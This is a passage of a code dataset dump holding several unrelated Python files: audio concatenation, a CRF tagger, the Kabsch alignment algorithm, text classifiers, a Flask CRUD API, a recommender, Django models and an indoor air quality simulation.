60, help = 'time(minute)')\n\n return parser.parse_args()\n\n\ndef cal_amp(wf):\n buf = wf.readframes(wf.getnframes())\n amp = (np.frombuffer(buf, dtype = \"int16\")).astype(np.float64)\n return amp\n\nif __name__ == \"__main__\":\n\n\n \"\"\"---get directry and wav data path---\"\"\"\n args = get_args()\n\n input_wav = vad_utils.get_path(args.input_wav) #get input path of de-silence file\n output_wav = vad_utils.get_path(args.output_wav)\n\n\n\n \"\"\"---concat clean wav data ---\"\"\"\n second = args.time * 60\n concat_data = np.empty(0)\n\n\n wf = wave.open(input_wav, \"r\")\n frames = wf.getnframes()\n sr = wf.getframerate()\n sum_frames = second * sr\n amp= cal_amp(wf)\n\n #print(amp)\n print(sum_frames)\n\n while(sum_frames > len(concat_data)):\n concat_data = np.concatenate([concat_data, amp])\n print(len(concat_data))\n\n wf.close()\n\n concat_data = np.array(concat_data)\n output_data = wave.Wave_write(output_wav)\n output_data.setparams(wf.getparams())\n output_data.writeframes(array.array('h', concat_data.astype(np.int16)).tostring())\n output_data.close()\n","sub_path":"VAD/utils/concat_noise.py","file_name":"concat_noise.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"371450056","text":"import sys\n\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom holder import *\nfrom util import *\n\n\nclass CRF(torch.nn.Module):\n\tdef __init__(self, opt, shared):\n\t\tsuper(CRF, self).__init__()\n\t\tself.opt = opt\n\t\tself.shared = shared\n\n\t\tself.trans_weight = nn.Parameter(\n\t\t\ttorch.ones(opt.num_label+2, opt.num_label+2), requires_grad=True)\n\t\t# hacky, to postpone initialization to make sure data split are the same as basline\n\t\tself.trans_weight.skip_init = 1\n\t\tself.trans_weight.initialized = 0\n\n\t\tself.bos_idx = 0\n\t\tself.eos_idx = 1\n\t\tself.trans_weight.data[self.bos_idx, :] = -10000.0\n\t\tself.trans_weight.data[:, self.eos_idx] = -10000.0\n\n\tdef __init_trans(self):\n\t\tif self.trans_weight.requires_grad and self.training:\n\t\t\tprint('lazy initializing transition weight')\n\t\t\t#nn.init.xavier_uniform_(self.trans_weight)\n\t\t\tnn.init.normal(self.trans_weight, 0, 1)\n\t\t\t#self.trans_weight.data[self.bos_idx, :] = -10000.0\n\t\t\t#self.trans_weight.data[:, self.eos_idx] = -10000.0\n\n\tdef log_sum_exp(self, vec, dim=0):\n\t\tmax_v, idx = torch.max(vec, dim)\n\t\tmax_exp = max_v.unsqueeze(-1).expand_as(vec)\n\t\treturn max_v + torch.log(torch.sum(torch.exp(vec - max_exp), dim))\n\n\tdef argmax(self, x): # for 1D tensor\n\t\treturn torch.max(x, 0)[1].data[0]\n\n\t# get the partition Z\n\t# score of shape (batch_l, source_l, num_label+2)\n\tdef forward(self, score):\n\t\t# trim off the <box> and <eos>\n\t\tscore = score[:, 1:-1, :]\n\t\tbatch_size, seq_len, n_labels = score.size()\n\t\talpha = score.data.new(batch_size, n_labels).fill_(-10000)\n\t\talpha[:, self.bos_idx] = 0\n\t\talpha = Variable(alpha)\n\t\tlens = Variable(torch.LongTensor([seq_len]*batch_size))\n\t\tif self.opt.gpuid != -1:\n\t\t\talpha = alpha.cuda()\n\t\t\tlens = lens.cuda()\n\n\t\tc_lens = lens.clone()\n\n\t\tlogits_t = score.transpose(1, 0)\n\t\tfor logit in logits_t:\n\t\t\tlogit_exp = logit.unsqueeze(-1).expand(batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t *self.trans_weight.size())\n\t\t\talpha_exp = alpha.unsqueeze(1).expand(batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t *self.trans_weight.size())\n\t\t\ttrans_exp = self.trans_weight.unsqueeze(0).expand_as(alpha_exp)\n\t\t\tmat = trans_exp + alpha_exp + logit_exp\n\t\t\talpha_nxt = self.log_sum_exp(mat, 2).squeeze(-1)\n\n\t\t\tmask = (c_lens > 0).float().unsqueeze(-1).expand_as(alpha)\n\t\t\talpha = mask * alpha_nxt + (1 - mask) * alpha\n\t\t\tc_lens = c_lens - 1\n\n\t\talpha = alpha + self.trans_weight[self.eos_idx].unsqueeze(0).expand_as(alpha)\n\t\tnorm = self.log_sum_exp(alpha, 1).squeeze(-1)\n\n\t\treturn norm\n\n\t# viterbi decoding\n\t# \tinput y_score of shape (batch_l, source_l, num_label+2)\n\tdef viterbi_decode(self, y_score):\n\t\t# trim off the <box> and <eos>\n\t\ty_score = y_score[:, 1:-1, :]\n\t\tbatch_size, seq_len, n_labels = y_score.size()\n\t\tvit = y_score.data.new(batch_size, n_labels).fill_(-10000)\n\t\tvit[:, self.bos_idx] = 0\n\t\tvit = Variable(vit)\n\t\tlens = Variable(torch.LongTensor([seq_len]*batch_size))\n\t\tif self.opt.gpuid != -1:\n\t\t\tvit = vit.cuda()\n\t\t\tlens = lens.cuda()\n\n\t\tc_lens = lens.clone()\n\n\t\tlogits_t = y_score.transpose(1, 0)\n\t\tpointers = []\n\t\tfor logit in logits_t:\n\t\t\tvit_exp = vit.unsqueeze(1).expand(batch_size, n_labels, n_labels)\n\t\t\ttrn_exp = self.trans_weight.unsqueeze(0).expand_as(vit_exp)\n\t\t\tvit_trn_sum = vit_exp + trn_exp\n\t\t\tvt_max, vt_argmax = vit_trn_sum.max(2)\n\n\t\t\tvt_max = vt_max.squeeze(-1)\n\t\t\tvit_nxt = vt_max + logit\n\t\t\tpointers.append(vt_argmax.squeeze(-1).unsqueeze(0))\n\n\t\t\tmask = (c_lens > 0).float().unsqueeze(-1).expand_as(vit_nxt)\n\t\t\tvit = mask * vit_nxt + (1 - mask) * vit\n\n\t\t\tmask = (c_lens == 1).float().unsqueeze(-1).expand_as(vit_nxt)\n\t\t\tvit += mask * self.trans_weight[ self.eos_idx ].unsqueeze(0).expand_as(vit_nxt)\n\n\t\t\tc_lens = c_lens - 1\n\n\t\tpointers = torch.cat(pointers)\n\t\tscores, idx = vit.max(1)\n\t\tidx = idx.squeeze(-1)\n\t\tif len(idx.shape) == 0:\n\t\t\tidx = idx.view(1)\n\t\tpaths = [idx.unsqueeze(1)]\n\n\t\tfor argmax in reversed(pointers):\n\t\t\tidx_exp = idx.unsqueeze(-1)\n\t\t\tidx = torch.gather(argmax, 1, idx_exp)\n\t\t\tidx = idx.squeeze(-1)\n\n\t\t\tpaths.insert(0, idx.unsqueeze(1))\n\n\t\tpaths = torch.cat(paths[1:], 1)\n\t\tscores = scores.squeeze(-1)\n\n\t\t# reconcat\n\t\tbos = Variable(torch.LongTensor([self.bos_idx]*batch_size)).view(batch_size, 1)\n\t\teos = Variable(torch.LongTensor([self.eos_idx]*batch_size)).view(batch_size, 1)\n\t\tif self.opt.gpuid != -1:\n\t\t\tbos = bos.cuda()\n\t\t\teos = eos.cuda()\n\t\tpaths = torch.cat([bos, paths, eos], -1)\n\n\t\treturn scores, paths\n\n\n\tdef begin_pass(self):\n\t\tif self.trans_weight.initialized == 0:\n\t\t\tself.__init_trans()\n\t\t\tself.trans_weight.initialized = 1\n\t\t\n\n\tdef end_pass(self):\n\t\tpass\n\n\n\nif __name__ == '__main__':\n\topt = Holder()\n\tshared = Holder()\n\topt.gpuid = -1\n\topt.num_label = 5\n\tshared.batch_l = 1\n\tshared.source_l = 10\n\n\ty_score = Variable(torch.randn(shared.batch_l, shared.source_l, opt.num_label+2))\n\tcrf = CRF(opt, shared)\n\n\tz = crf(y_score)\n\tprint(z)\n\ty = crf.viterbi_decode(y_score)\n\tprint(y)","sub_path":"chunking/crf.py","file_name":"crf.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"311431263","text":"def gcd(a, b):\n assert a >= 0 and b >= 0 and a + b > 0\n\n while a > 0 and b > 0:\n if a >= b:\n a = a % b\n else:\n b = b % a\n return max(a, b)\n\ndef diophantine(a, b, c):\n assert c % gcd(a, b) == 0\n # return (x, y) such that a * x + b * y = c\n return (0, c/b)\n","sub_path":"Introduction_to_Discrete_Mathematics_for_Computer_Science_Specialization/Number_Theory_and_Cryptography/Diophantine_Equations.py","file_name":"Diophantine_Equations.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"333886850","text":"#Procrustes\n#Umeyama\n#Multiple View Geometry in Computer Vision (Second Edition)->78\n#Enhancing Projective Spatial Augmented Reality in Industry A Model Based Approach for Registration and Calibration-> 58\n#http://nghiaho.com/?page_id=671\n\n\nimport numpy as np\n\ndef kabsch(P, Q):\n \"\"\"\n Compute the optimal rigid transformation between two sets of points in 2D or 3D space using the Kabsch algorithm.\n \n Parameters:\n - P: A (N, D) array representing the first set of points, where N is the number of points and D is the number of dimensions (2 or 3).\n - Q: A (N, D) array representing the second set of points, where N is the number of points and D is the number of dimensions (2 or 3).\n \n Returns:\n - R: A (D, D) rotation matrix representing the optimal rotation.\n - t: A (D,) translation vector representing the optimal translation.\n \"\"\"\n # Center the points\n mean_P = np.mean(P, axis=0)\n mean_Q = np.mean(Q, axis=0)\n P_centered = P - mean_P\n Q_centered = Q - mean_Q\n \n # Compute the covariance matrix\n cov = P_centered.T @ Q_centered\n \n # Compute the singular value decomposition of the covariance matrix\n U, S, Vt = np.linalg.svd(cov)\n \n # Compute the optimal rotation\n D = np.eye(P.shape[1])\n if np.linalg.det(U) * np.linalg.det(Vt) < 0:\n D[-1, -1] = -1\n R = U @ D @ Vt\n \n # Compute the optimal translation\n t = mean_Q - R @ mean_P\n \n return R, t\n \n \n# Example usage\n\nimport numpy as np\n\n# Generate two sets of points\nnp.random.seed(0)\nP = np.random.rand(10, 2)\nQ = np.random.rand(10, 2)\n\n# Apply the Kabsch algorithm\nR, t = kabsch(P, Q)\n\n# Align the points\nQ_aligned = (Q - t) @ R\n\n# Compute the root mean square distance between the aligned points and the original points\nrmse = np.sqrt(np.mean((P - Q_aligned)**2))\nprint(\"RMSE:\", rmse) \n","sub_path":"scripts/shape_analysis/kabsch/kabsch_algorithm.py","file_name":"kabsch_algorithm.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"425062292","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\ndata = pd.read_csv('dataset.csv')\nabstracts = [BeautifulSoup(x).get_text() for x in data['abstract']]\n\ntfidf = TfidfVectorizer()\nX = tfidf.fit_transform(abstracts)\ny = data['type'].to_numpy()\n\nsupport_vec = svm.SVC(kernel='rbf', C=1000, gamma=0.001)\nrf = RandomForestClassifier(criterion='gini', max_features='sqrt', n_estimators=700)\nsgd = SGDClassifier(alpha=0.0001, fit_intercept=True, loss='modified_huber', penalty='l2')\npac = PassiveAggressiveClassifier(C=1.0, early_stopping=True, fit_intercept=True, max_iter=2000)\n\nsupport_vec.fit(X, y)\nrf.fit(X, y)\nsgd.fit(X, y)\npac.fit(X, y)\n\np_data = pd.read_csv('potentially_fake.tsv', sep='\\t')\np_abstracts = [BeautifulSoup(x).get_text() for x in p_data['abstract']]\nfake_indexes = []\nfor index in range(len(p_abstracts)):\n tfidf_pred = TfidfVectorizer(vocabulary=tfidf.vocabulary_)\n p_x = tfidf_pred.fit_transform([p_abstracts[index]])\n predictions = [support_vec.predict(p_x)[0], rf.predict(p_x)[0], sgd.predict(p_x)[0], pac.predict(p_x)[0]]\n # if there is a majority saying it is fake\n if predictions.count('fake') > 3:\n fake_indexes.append(index)\n print('Fake!')\n\np_data.loc[fake_indexes].to_csv('38_predicted_fake.csv')\n\n#-----------\n#-----------\n#-----------\n#-----------\n#-----------\n# get the terms and weights of those terms\nindex_value = {i[1]: i[0] for i in tfidf.vocabulary_.items()}\nfully_indexed = []\nfor row in X:\n fully_indexed.append({index_value[column]: value for (column, value) in zip(row.indices, row.data)})\n\ns_dic = {k: v for k, v in sorted(fully_indexed.items(), key=lambda item: item[1])}\n\nterms = {}\nfor d in fully_indexed:\n for k in d:\n if k in terms:\n terms[k].append(d[k])\n else:\n terms[k] = [d[k]]\n\n\ndef extract_topn_from_vector(feature_names, sorted_items, topn=10):\n \"\"\"get the feature names and tf-idf score of top n items\"\"\"\n\n # use only topn items from vector\n sorted_items = sorted_items[:topn]\n\n score_vals = []\n feature_vals = []\n\n # word index and corresponding tf-idf score\n for idx, score in sorted_items:\n # keep track of feature name and its corresponding score\n score_vals.append(round(score, 3))\n feature_vals.append(feature_names[idx])\n\n # create a tuples of feature,score\n # results = zip(feature_vals,score_vals)\n results = {}\n for idx in range(len(feature_vals)):\n results[feature_vals[idx]] = score_vals[idx]\n\n return results\n\n\ndef sort_coo(coo_matrix):\n tuples = zip(coo_matrix.col, coo_matrix.data)\n return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)\n\n\ntfidf_transformer = TfidfTransformer(smooth_idf=True, use_idf=True)\ntfidf_transformer.fit(X)\nterm_counts = {}\nfor abstract in abstracts:\n tf_idf_vector = tfidf_transformer.transform(tfidf.transform([abstract]))\n sorted_items = sort_coo(tf_idf_vector.tocoo())\n feature_names = tfidf.get_feature_names()\n keywords = extract_topn_from_vector(feature_names, sorted_items, 10)\n for k in keywords:\n if k in term_counts:\n term_counts[k] += keywords[k]\n else:\n term_counts[k] = keywords[k]\n\nsd = {k: v for k, v in sorted(term_counts.items(), key=lambda item: item[1])}\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"366546643","text":"from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom database import db, User, UserSchema\nimport os\n\napp = Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'crud.sqlite')\n# db.init_app(app)\n\nwith app.app_context():\n db.init_app(app)\n db.create_all()\n\n\nuser_schema = UserSchema()\nusers_schema = UserSchema(many=True)\n\n\n# endpoint to create new user\n@app.route(\"/user\", methods=[\"POST\"])\ndef add_user():\n request_dict = request.form\n name = request_dict[\"name\"]\n x = request_dict[\"x\"]\n y = request_dict[\"y\"]\n angle = request_dict[\"angle\"]\n\n new_user = User(name, x, y, angle)\n\n db.session.add(new_user)\n db.session.commit()\n\n # res = user_schema.dump(new_user)\n return user_schema.jsonify(new_user)\n\n\n# endpoint to show all users\n@app.route(\"/user\", methods=[\"GET\"])\ndef get_user():\n all_users = User.query.all()\n result = users_schema.dump(all_users)\n return jsonify(result.data)\n\n\n# endpoint to get user detail by id\n@app.route(\"/user/<id>\", methods=[\"GET\"])\ndef user_detail(id):\n user = User.query.get(id)\n return user_schema.jsonify(user)\n\n\n# endpoint to update user\n@app.route(\"/user/<id>\", methods=[\"PUT\"])\ndef user_update(id):\n user = User.query.get(id)\n request_dict = request.form\n name = request_dict['name']\n angle = request_dict['angle']\n\n user.name = name\n user.angle = angle\n\n db.session.commit()\n return user_schema.jsonify(user)\n\n\n# endpoint to delete user\n@app.route(\"/user/<id>\", methods=[\"DELETE\"])\ndef user_delete(id):\n user = User.query.get(id)\n db.session.delete(user)\n db.session.commit()\n\n return user_schema.jsonify(user)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='8000')\n","sub_path":"file1.py","file_name":"file1.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"2934645","text":"import random\nimport math\nimport collections\nimport datetime\nimport math\n\ndef get_user_brands(reco_file_path, end_date):\n '''用户商品倒插表'''\n beta = 0.5\n reco_file=open(reco_file_path,\"r\")\n reco_file.readline()\n brand_pref = collections.defaultdict(lambda :0)\n for line in reco_file:\n line = line.strip()\n user_name, brand_id, behavior_id, date_str = tuple(line.split(\",\"))\n\n cur_date = datetime.date(2013,\n int(date_str[0:date_str.find('月')]),\n int(date_str[date_str.find('月')+1:-1]))\n # 流行度\n popularity = 1 / (1 + beta * (end_date - cur_date).days)\n brand_pref[brand_id] += popularity\n # print(brand_pref)\n\n pref_thres = 1.5\n # print(brand_pref)\n # brand_pref = {brand_id:pref for brand_id, pref in brand_pref.items() if pref > pref_thres }\n item_pool = [brand_id for brand_id, pref in brand_pref.items() if pref > pref_thres]\n\n reco_file=open(reco_file_path,\"r\")\n reco_file.readline()\n\n user_brands = collections.defaultdict(lambda :\n collections.defaultdict(lambda :0))\n # brand_users = collections.defaultdict(lambda :\n # collections.defaultdict(lambda :0))\n\n mu, record_time = 0, 0\n\n for line in reco_file:\n line = line.strip()\n user_name, brand_id, behavior_id, date_str = tuple(line.split(\",\"))\n\n # if behavior_id == '1' or behavior_id == '0':\n if behavior_id == '1':\n user_brands[user_name][brand_id] += 1\n mu += 1\n else:\n user_brands[user_name][brand_id] += 0\n mu += 0\n # brand_users[brand_id][user_name] += 1\n record_time += 1\n\n mu /= record_time\n\n # for user_name, brand_ids in user_brands.items():\n # print(user_name, brand_ids)\n\n return (user_brands, item_pool, mu)\n\n\ndef init_model(user_brands, K):\n '''初始化偏置LFM'''\n\n P = {key:[random.random()/math.sqrt(K) for x in range(K)]\n for key in user_brands.keys()}\n bu = {key:0 for key in user_brands.keys()}\n\n brand_keys = set()\n for user_name, brand_id_dict in user_brands.items():\n for brand_id in brand_id_dict:\n brand_keys.add(brand_id)\n\n Q = {key:[random.random()/math.sqrt(K) for x in range(K)]\n for key in brand_keys}\n bi = {key:0 for key in brand_keys}\n y = {key:[random.random()/math.sqrt(K) for x in range(K)]\n for key in brand_keys}\n\n return (P, Q, bu, bi, y)\n\ndef preference(user, brand, history_brand, y, p, q, bu, bi, mu):\n '''用户对品牌的兴趣'''\n pref = mu + bu[user] + bi[brand]\n \n nei_sum = p[user]\n for brand in history_brand:\n nei_sum = [nei_sum[idx] + y[brand][idx] for idx in range(0, len(p[user]))]\n pref += sum(q[brand][f]*nei_sum[f] for f in range(0, len(q[brand])))\n return pref \n\ndef select_samples(items, item_pool, ratio):\n '''随机选择负样本'''\n\n ret = {key:1 for key, buy_time in items.items() if buy_time >= 1}\n\n samples_size = ratio * len(ret)\n for i in range(0, int(len(ret) * ratio/2)):\n item = item_pool[random.randint(0,len(item_pool)-1)]\n if item in ret:\n continue\n ret[item] = 0\n if len(ret) > samples_size:\n break\n return ret\n\ndef svd_plus(user_brands, item_pool, ratio, K, mu, step_time, alpha, lamb):\n '''隐语义模型'''\n P, Q, bu, bi, y = init_model(user_brands, K)\n z = {}\n for step in range(0, step_time):\n print('training......', step)\n for user, brands in user_brands.items():\n z[user] = P[user]\n ru = 1 / math.sqrt(1.0 * len(brands))\n samples = select_samples(brands, item_pool, ratio)\n for item, rui in samples.items():\n z[user] = [z[user][idx] + y[item][idx]*rui for idx in range(0, K)]\n \n temp_sum = [0 for idx in range(0, K)]\n for item, rui in samples.items():\n eui = rui - preference(user, item, brands, y, P, Q, bu, bi, mu) \n bu[user] += alpha * (eui - lamb * bu[user])\n bi[item] += alpha * (eui - lamb * bi[item])\n for f in range(0, K):\n temp_sum[f] += Q[item][f] * eui * rui\n P[user][f] += alpha * (eui * Q[item][f] - lamb * P[user][f])\n Q[item][f] += alpha * (z[user][f] +\\\n eui * P[user][f] - lamb * Q[item][f])\n for item, rui in samples.items():\n y[item] += [alpha*(temp_sum[idx] - lamb * y[item][idx]) for idx in range(0, K)]\n\n alpha *= 0.9\n # print(Q['7868'])\n # 归一化\n # for key, values in P.items():\n # m = math.sqrt(sum(value*value for value in values))\n # P[key] = [value/m for value in values]\n\n # for key, values in Q.items():\n # m = math.sqrt(sum(value*value for value in values))\n # Q[key] = [value/m for value in values]\n\n # print(Q['7868'])\n\n return (P, Q, bu, bi, y)\n\ndef recommend(user, history_brand, y, P, Q, bu, bi, mu):\n '''推荐'''\n\n rank = {brand:preference(user, brand, history_brand, y, P, Q, bu, bi, mu)\n for brand, q in Q.items()}\n\n return rank\n\n \nif __name__ == '__main__':\n\n ali_file_path = \"E:\\作业汇总\\学术会议及讲座\\天池\\data\\\\t_alibaba_data.csv\"\n data_file_path = \"E:\\作业汇总\\学术会议及讲座\\天池\\data\\data_4_7_15.txt\"\n result_file_path = \"E:\\作业汇总\\学术会议及讲座\\天池\\\\result\\lfm_7_15.txt\"\n result_file = open(result_file_path, 'w')\n\n # data_file_path = \"Z:\\CodeSpace\\Python\\天池\\data\\\\test.txt\"\n\n ratio, K, step_time, alpha, lamb = 3, 10, 200, 0.02, 0.02\n\n user_brands, item_pool, mu\\\n = get_user_brands(data_file_path, datetime.date(2013, 7, 15))\n\n P, Q, bu, bi, y = svd_plus(user_brands, item_pool, ratio, K, mu, step_time, alpha, lamb)\n\n rank_thres = 0.7\n\n print(\"recommending...\")\n\n for user_name, brands in user_brands.items():\n rank = recommend(user_name, brands, y, P, Q, bu, bi, mu)\n \n rank = {brand:pref for brand, pref in rank.items() if pref > rank_thres}\n # print(rank)\n\n commit_brand = sorted(rank.items(), key=lambda d:d[1], reverse = True)[:10]\n # if len(commit_brand) > 1 and commit_brand[0][0] == '27791' and commit_brand[0][1] < 0.7:\n # commit_brand = commit_brand[1:11]\n # else:\n # commit_brand = commit_brand[:10]\n commit_brand = [brand for brand, pref in commit_brand]\n \n\n if len(commit_brand) < 1:\n continue\n\n result_file.write(user_name + '\\t' + ','.join(commit_brand) + '\\n')\n # print(sorted_rank[:10])\n","sub_path":"recommond/lfm/svd_plus.py","file_name":"svd_plus.py","file_ext":"py","file_size_in_byte":6691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"413986421","text":"from django.db import models\nfrom rest_framework.exceptions import ( NotFound,)\n\nfrom ratebum.apps.core.models import TimestampedModel\nfrom ratebum.settings import spotify_api\nfrom .formatter import (\n format_spotify_artist,\n format_spotify_album,\n format_spotify_track,\n)\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass Artist(TimestampedModel):\n name = models.CharField(max_length=100)\n spotify_id = models.CharField(max_length=500, unique=True)\n spotify_url = models.URLField(max_length=500)\n image_url = models.URLField(max_length=500)\n\n # genres separated by a comma (,)\n genres = models.CharField(max_length=500) \n\n followers = models.PositiveIntegerField()\n popularity = models.SmallIntegerField()\n\n def __str__(self):\n return self.name\n\nclass Album(TimestampedModel):\n name = models.CharField(max_length=80)\n spotify_id = models.CharField(max_length=500, unique=True)\n spotify_url = models.URLField(max_length=500)\n\n artist = models.ForeignKey(\n 'Artist',\n related_name='albums',\n on_delete=models.CASCADE\n )\n\n release_date = models.DateField()\n image_url = models.URLField(max_length=500)\n genres = models.CharField(max_length=500) \n total_tracks = models.SmallIntegerField()\n duration_ms = models.IntegerField()\n popularity = models.SmallIntegerField()\n\n def __str__(self):\n return \"{} ({})\".format(self.name, self.release_date.year)\n\nclass Track(models.Model):\n name = models.CharField(max_length=80)\n spotify_id = models.CharField(max_length=500, unique=True)\n preview_url = models.URLField(max_length=500, null=True)\n\n album = models.ForeignKey(\n 'Album',\n related_name='tracks',\n on_delete=models.CASCADE\n )\n\n duration_ms = models.IntegerField()\n track_number = models.SmallIntegerField()\n\n def __str__(self):\n return self.name\n\n\ndef get_music_model_instance(spotify_id, item_type):\n if item_type == 'artist':\n try:\n artist = Artist.objects.get(spotify_id=spotify_id)\n except Artist.DoesNotExist:\n artist = create_new_artist_from_spotify(spotify_id)\n return artist\n\n elif item_type == 'album':\n try:\n album = Album.objects.get(spotify_id=spotify_id)\n except Album.DoesNotExist:\n album = create_new_album_from_spotify(spotify_id)\n return album\n else:\n raise Exception('invalid type')\n\n\ndef create_new_artist_from_spotify(spotify_id):\n try:\n artist_from_spotify = spotify_api.get_artist(spotify_id)\n except:\n raise NotFound('Artist not found on Spotify database or Spotify API not avaliable')\n\n artist_data = format_spotify_artist(artist_from_spotify)\n artist = Artist.objects.create(**artist_data)\n return artist\n\n\ndef create_new_album_from_spotify(spotify_id):\n try:\n album_from_spotify = spotify_api.get_album(spotify_id)\n except:\n raise NotFound(\n 'Album not found on Spotify database or Spotify API not avaliable')\n\n artist_id = album_from_spotify['artists'][0]['id']\n try:\n artist = Artist.objects.get(spotify_id=artist_id)\n except Artist.DoesNotExist: \n album_artist = spotify_api.get_artist(artist_id)\n artist_data = format_spotify_artist(album_artist)\n artist = Artist.objects.create(**artist_data)\n\n album_data = format_spotify_album(album_from_spotify)\n tracks_list = album_data.pop('tracks')\n album = Album.objects.create(artist=artist, **album_data)\n\n for track in tracks_list:\n Track.objects.create(album=album, **track)\n \n return album\n","sub_path":"ratebum/apps/music/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"414829904","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/syn/dev/test/mogo62/mogo/mgof/templatetags/mgof.py\n# Compiled at: 2016-09-04 06:17:49\nfrom django import template\nfrom ..models import Topic\nregister = template.Library()\n\nclass LastPosts(template.Node):\n\n def __init__(self, num_posts=10):\n topics = Topic.objects.filter().select_related('forum').order_by('-last_post_date')[:num_posts]\n topics_ok = []\n for topic in topics:\n if topic.forum.is_public is True:\n topics_ok.append(topic)\n\n self.topics = topics_ok\n\n def render(self, context):\n context['topics'] = self.topics\n return ''\n\n\ndef forums_last_posts(parser, token):\n return LastPosts()\n\n\nregister.tag('forums_last_posts', forums_last_posts)","sub_path":"pycfiles/django-mgof-0.1.1.tar/mgof.py","file_name":"mgof.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"398553127","text":"# -*- coding: utf-8 -*-\n#quelques couleurs\nrouge_A='#C60C2E'\nvert1_A='#005157'\nvert2_A='#627D77'\nvert3_A='#9EB28F'\nvert4_A='#C5E5A4'\ngris1_A='#595A5C'\ncoule=[rouge_A,vert1_A,vert2_A,vert3_A,vert4_A,gris1_A]\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import fsolve\n\n# governing equations as a reminder\n#Cp = C + dt*( tau*(Ce-C) -delta*C+ rho*S*L/V)\n#Lp = L + dt*( rho*V*C/S - rho*S*L/S )\ndef fc_IAQ_coupled(vec_CLp, vec_CL, tau,delta,dt,rho,S,V,Ce):\n\tC,L = vec_CL[0],vec_CL[1]\n\tCp,Lp = vec_CLp[0],vec_CLp[1]\n\tC_term = -Cp + C + 0.5*dt*( tau*(Ce-C) -delta*C+ rho*S*L/V) + 0.5*dt*( tau*(Ce-Cp) -delta*Cp+ rho*S*Lp/V)\n\tL_term = -Lp + L + 0.5*dt*( delta*V*C/S - rho*S*L/S ) + 0.5*dt*( delta*V*Cp/S - rho*S*Lp/S )\n\treturn [C_term,L_term]\n\n# enclosure\nL,l,h=5,5,3# dimensions\nS=2*( L*l+l*h+ h*L) # m2\nV=L*l*h # m3 \ntau=0.1# vol/h\nqv=V*tau#m3/h\ntau=qv/V\n\nCinit=20\nLinit=100\nCe_base=20\ndelta=0.15#\t1/h\nrho_base=0.5 # initial efficiency\n\nC,L=Cinit,Linit\nconcentration,deposition,time=[],[],[]\nrhoC,deltaC=[],[]\nrhop=[]\n\nnb_period=2\nperiod=24\ndt=0.1 #h\nsim_time=nb_period*24 # hour\nt=0 # hour\n\nwhile t < sim_time:\n\tCe=Ce_base + 5*(np.cos(t*2*np.pi/period))\n\trho=rho_base*abs(np.sin(t*2*np.pi/period))\n\tC_plus,L_plus=fsolve(fc_IAQ_coupled, [C,L], args=([C,L],tau,delta,dt,rho,S,V,Ce))\n\tC,L=C_plus,L_plus\n\tt+=dt\n\tconcentration.append(C)\n\tdeposition.append(L)\n\ttime.append(t)\n\trhop.append(rho)\n\trhoC.append(rho*S*L/V)\n\tdeltaC.append(delta*C)\n\t\n\t\nplt.subplot(121)\nplt.xlabel(\"Time [h]\")\nplt.ylabel(r\"Concentration [µg/m$^3$]\")\nplt.plot(time, concentration, '-',color=coule[0], alpha=0.65,label='C')\n#plt.plot(time, rhop, '--',color=coule[1], alpha=0.65,label='rho')\nplt.legend()\n\nplt.subplot(122)\nplt.xlabel(\"Time [h]\")\nplt.ylabel(r\"Mass on surfaces [µg/m$^2$]\")\nplt.plot(time, deposition, '-',color=coule[-1], alpha=0.65,label='L')\nplt.legend()\n\nplt.tight_layout()\n\n\nplt.clf()\nplt.subplot(121)\nplt.xlabel(\"Time [h]\")\nplt.ylabel(r\"Resuspension rate [µg/m$^3$]\")\nplt.plot(time, rhop, '-',color=coule[0], alpha=0.65,label=r'$\\rho$')\nplt.legend()\n\nplt.subplot(122)\nplt.xlabel(\"Time [h]\")\nplt.ylabel(r\"Transfer to air [µg/m$^{3}$] and surfaces [µg/m$^{2}$]\")\nplt.plot(time, rhoC, '--',color=coule[3], alpha=0.65,label=r'$ \\frac{\\rho L S}{V}$')\nplt.plot(time, deltaC, '-',color=coule[2], alpha=0.65,label=r'$\\delta 